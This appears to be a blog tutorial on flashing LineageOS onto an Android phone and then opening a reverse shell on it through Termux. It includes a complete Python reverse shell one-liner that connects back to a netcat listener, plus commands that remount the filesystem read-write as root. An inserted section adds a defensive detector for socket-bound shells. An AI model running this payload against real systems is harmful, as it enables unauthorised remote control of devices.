In this post we’ll set up a reverse shell on the Lineage OS Android distribution, but the same can be achieved on other distributions as well.
First, let’s see how to install Lineage OS on your device. Feel free to skip this section if you’re not interested.
Jailbreak and install Lineage OS
Before you start, you may need to jailbreak your device. Once you’ve done that, follow the steps below to install Lineage OS.
Step 1. Find your device here.
Step 2. Download the builds. For example, for a Moto G7, the builds are available here.
Step 3. Download adb and fastboot and extract the files somewhere on your system. More info here. For example, for Linux, the zip file is available here. Once you have the executables, enable USB debugging on your Android device, connect it to your computer and run adb devices. You should see the device listed in your terminal.
Step 4. Restart the device in fastboot mode by running the command: adb -d reboot bootloader
Step 5. Once the phone boots up, run the command fastboot devices. You should see the device listed there. If you haven’t unlocked your device yet, now is the time to do it. The Lineage OS website will have the link that you need. For example, for Motorola it’s this one.
Step 6. Now that you’re in fastboot mode, we can start installing the images you downloaded at Step 2. Make sure they’re in the same folder as your adb and fastboot executables. Now run the command fastboot flash boot boot.img. When it’s done, reboot your Android system and select the Recovery option.
Step 7. Make sure that your partitions are consistent by following the steps outlined here. Basically, you download this zip file, select Apply Update -> Apply from ADB on your Android device and then from your terminal run this command: adb -d sideload copy-partitions-20220613-signed.zip
Step 8. Reboot the device, select Recovery mode, then Factory reset -> Format data / factory reset. When it’s done, go back to the main menu, select Apply Update -> Apply from ADB, then run this command on your computer: adb -d sideload lineage-<version>-<build_number>-nightly-<phone_codename>-signed.zip
You’re done installing the OS, now let’s have some fun 🙂
Start a reverse shell on your Android device
You already have a browser on the device, but we need one more app. (Optional) Visit the F-Droid website on your Android device and install the F-Droid app.
We’ll need Termux, which is a terminal emulator and Linux environment app. Open the F-Droid app, search for Termux and install it. You can also install it straight from the Termux website. This will give you access to a lot of Linux executables.
Open the Termux app and run the command pkg install python to install Python.
Let’s start setting up our reverse shell.
Step 1. Connect your phone, enable USB debugging and run adb devices. Once the device shows up there, we’re ready to start. Start a netcat listener on your computer (nc -lvp 8448). From here on, we’ll assume your computer’s IP is 10.0.0.63. Change it to reflect your computer’s address.
Step 2. If you want to have your filesystem fully writable, run
adb root
adb shell mount -o rw,remount /
If you don’t need that, just run adb shell.
Step 3. On the Android device, go to the folder where Termux has the python executable installed. Try cd /data/data/com.termux/files/usr/bin, or run the command find / -name termux to locate Termux’s folder. Now it’s time to set up the reverse shell. For this, run the command:
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.63",8448));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
You can find more python payloads here.
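The os.dup2 calls in that one-liner are also what give the connection away on the device: the python process ends up with stdin, stdout and stderr all bound to the same socket, where an interactive shell has a /dev/pts/N. The following is an added example, not code from the original post: a small Python detector for that fd layout, run over a constructed sample table and, on Linux or Android where /proc is available, over the live process list (the socket:[inode] link format is the standard Linux one; the sample PIDs and inode numbers are made up).

```python
import os
import re

SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")

def suspicious_fd_tables(fd_tables: dict) -> list:
    """Return PIDs whose fds 0, 1 and 2 all resolve to the same socket inode,
    the layout the one-liner's os.dup2 calls leave in the python process
    (an interactive shell has /dev/pts/N on those fds instead)."""
    hits = []
    for pid, fds in fd_tables.items():
        inodes = set()
        for fd in (0, 1, 2):
            match = SOCKET_RE.match(fds.get(fd, ""))
            if not match:
                break
            inodes.add(match.group(1))
        else:  # all three fds were sockets
            if len(inodes) == 1:
                hits.append(pid)
    return sorted(hits)

def read_proc_fd_tables(proc: str = "/proc") -> dict:
    """Collect {pid: {fd: link target}} for fds 0-2 from a live /proc (Linux/Android).
    Returns {} where /proc is absent; fds we may not read (no root) are left out."""
    tables = {}
    if not os.path.isdir(proc):
        return tables
    for pid in filter(str.isdigit, os.listdir(proc)):
        fds = {}
        for fd in (0, 1, 2):
            try:
                fds[fd] = os.readlink(f"{proc}/{pid}/fd/{fd}")
            except OSError:  # process exited or not readable without root
                pass
        tables[int(pid)] = fds
    return tables

# Constructed sample shaped like `ls -l /proc/<pid>/fd`: 1000 is a normal Termux
# shell, 4242 the python process running the one-liner, 4300 a daemon logging to a socket.
SAMPLE = {
    1000: {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"},
    4242: {0: "socket:[58211]", 1: "socket:[58211]", 2: "socket:[58211]"},
    4300: {0: "/dev/null", 1: "socket:[58300]", 2: "/dev/null"},
}

if __name__ == "__main__":
    for pid in suspicious_fd_tables(read_proc_fd_tables() or SAMPLE):
        print(f"pid {pid}: stdin/stdout/stderr all bound to one socket")
```

Run it from an adb root shell on the device (or from Termux for your own processes) to list every process that currently has its three standard streams on one socket; the same check is what `ls -l /proc/<pid>/fd` shows by hand.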
Go back to your netcat terminal and voilà: you have the reverse shell 🙂
Enjoy!